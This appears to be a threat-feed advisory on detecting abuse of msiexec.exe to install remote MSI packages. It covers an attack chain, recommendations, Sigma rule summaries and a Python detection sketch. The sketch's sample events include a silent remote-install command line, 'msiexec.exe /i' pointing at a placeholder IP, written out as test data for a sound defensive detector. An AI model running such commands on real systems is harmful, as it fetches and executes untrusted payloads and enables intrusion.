Threat Feed advisory (severity: low)

Potential Remote File Execution via MSIEXEC

The rule detects the built-in Windows Installer, msiexec.exe, being executed to install a remote package, a technique adversaries can abuse for initial access and defense evasion.

The Windows Installer (msiexec.exe) is a built-in Windows component used for installing, modifying, and removing software. Adversaries may abuse msiexec.exe to launch local or network-accessible MSI files, bypassing security controls and potentially leading to initial access or defense evasion. This activity is often part of a broader attack chain, used to deliver and execute malicious payloads. The detection rule provided by Elastic identifies suspicious msiexec.exe activity by monitoring process starts, network connections, and child processes. It filters out known benign signatures and paths to highlight potential misuse. This detection is designed to work with Elastic Defend data.

Attack Chain

  1. An attacker gains initial access via phishing (T1566) or other means to execute commands on the target system.
  2. The attacker uses msiexec.exe with the /V parameter to initiate the installation of a remote MSI package. This allows the attacker to bypass typical execution restrictions.
  3. Msiexec.exe attempts a network connection (T1105) to retrieve the remote MSI package from a malicious server.
  4. Msiexec.exe spawns a child process to handle the installation of the downloaded MSI package.
  5. The spawned child process executes malicious code embedded within the MSI package.
  6. The malicious code performs actions such as installing malware, modifying system settings, or establishing persistence.
  7. The attacker leverages the compromised system for further lateral movement or data exfiltration.

Impact

Successful exploitation can lead to the installation of malware, unauthorized access to sensitive data, and further compromise of the affected system and network. While this specific rule has a low risk score, it can be an early indicator of more serious attacks. It is crucial to investigate any alerts generated by this rule to determine the full scope and impact of the potential compromise.

Recommendation

  • Deploy the Sigma rule provided below to your SIEM to detect suspicious usage of msiexec.exe to install remote packages. Tune the rule for your environment by adding exceptions for legitimate software installation processes.
  • Enable process monitoring and network connection logging on Windows endpoints to provide the necessary data for the Sigma rule to function effectively (Data Source: Elastic Defend).
  • Review the “Possible investigation steps” section in the Elastic rule’s documentation to investigate potential false positives and legitimate uses of msiexec.exe.
  • Implement application control policies to restrict the execution of unauthorized applications, including potentially malicious MSI packages.

Detection coverage (2 rules)

Detect MSIEXEC Installing Remote Package

Severity: low

Detects msiexec.exe being used to install a remote MSI package, which can be indicative of malicious activity.

Format: sigma
Tactics: defense_evasion, initial_access
Techniques: T1218.007
Sources: process_creation, windows

Detect Network Connection by MSIEXEC during Remote Install

Severity: low

Detects network connections made by msiexec.exe during the process of installing a remote MSI package.

Format: sigma
Tactics: command_and_control, initial_access
Techniques: T1105
Sources: network_connection, windows
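As an added illustration (not the advisory's own Sigma rules, which it keeps inside the platform), the following Python sketches the two detections above over constructed process_creation and network_connection events and correlates them by process id; the parent-path allowlist, the 60-second window and all sample values are assumptions.

```python
import re
MSIEXEC = r"C:\Windows\System32\msiexec.exe"
# A remote package reference: an http(s) URL or a UNC path ending in .msi
REMOTE_MSI = re.compile(r"(?i)(?:https?://|\\\\[^\s\\]+\\)\S+\.msi\b")
# Constructed allowlist standing in for the benign parent paths a tuned rule carries
BENIGN_PARENTS = {r"c:\windows\ccm\ccmexec.exe"}

def basename(path):
    return path.lower().rsplit("\\", 1)[-1]

def is_remote_msi_install(ev):
    """First rule: msiexec.exe started against a remote .msi from a non-allowlisted parent."""
    return (ev["type"] == "process_creation"
            and basename(ev["image"]) == "msiexec.exe"
            and ev.get("parent_image", "").lower() not in BENIGN_PARENTS
            and REMOTE_MSI.search(ev["command_line"]) is not None)

def correlate(events, window_s=60):
    """Second rule: a network connection from the same msiexec.exe process within
    window_s seconds of a remote-install start. Returns one alert per pair."""
    starts = {}   # pid -> (start timestamp, command line)
    alerts = []
    for ev in sorted(events, key=lambda e: e["ts"]):
        if is_remote_msi_install(ev):
            starts[ev["pid"]] = (ev["ts"], ev["command_line"])
        elif ev["type"] == "network_connection" and basename(ev["image"]) == "msiexec.exe":
            start = starts.get(ev["pid"])
            if start and 0 <= ev["ts"] - start[0] <= window_s:
                alerts.append({"pid": ev["pid"], "dest": ev["dest_ip"], "command_line": start[1]})
    return alerts

# Constructed sample telemetry (timestamps in seconds, TEST-NET addresses)
SAMPLE_EVENTS = [
    {"type": "process_creation", "ts": 100, "pid": 1234, "image": MSIEXEC,
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": r"msiexec.exe /i https://203.0.113.10/update.msi /q"},
    {"type": "network_connection", "ts": 102, "pid": 1234, "image": MSIEXEC, "dest_ip": "203.0.113.10"},
    {"type": "process_creation", "ts": 200, "pid": 2222, "image": MSIEXEC,
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r"msiexec.exe /i C:\Temp\setup.msi /qn"},        # local package: no alert
    {"type": "network_connection", "ts": 201, "pid": 2222, "image": MSIEXEC, "dest_ip": "198.51.100.7"},
    {"type": "process_creation", "ts": 300, "pid": 3333, "image": MSIEXEC,
     "parent_image": r"C:\Windows\CCM\CcmExec.exe",                  # allowlisted parent: tuned out
     "command_line": r"msiexec.exe /i \\deploy01\share\agent.msi /qn"},
    {"type": "network_connection", "ts": 301, "pid": 3333, "image": MSIEXEC, "dest_ip": "192.0.2.5"},
]
if __name__ == "__main__":
    for a in correlate(SAMPLE_EVENTS):
        print(f"ALERT pid={a['pid']} dest={a['dest']} cmd={a['command_line']}")
```

Only the first process pair produces an alert: the second installs a local package and the third comes from an allowlisted parent, mirroring the benign-path exceptions the Elastic rule applies.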

Detection queries are kept inside the platform.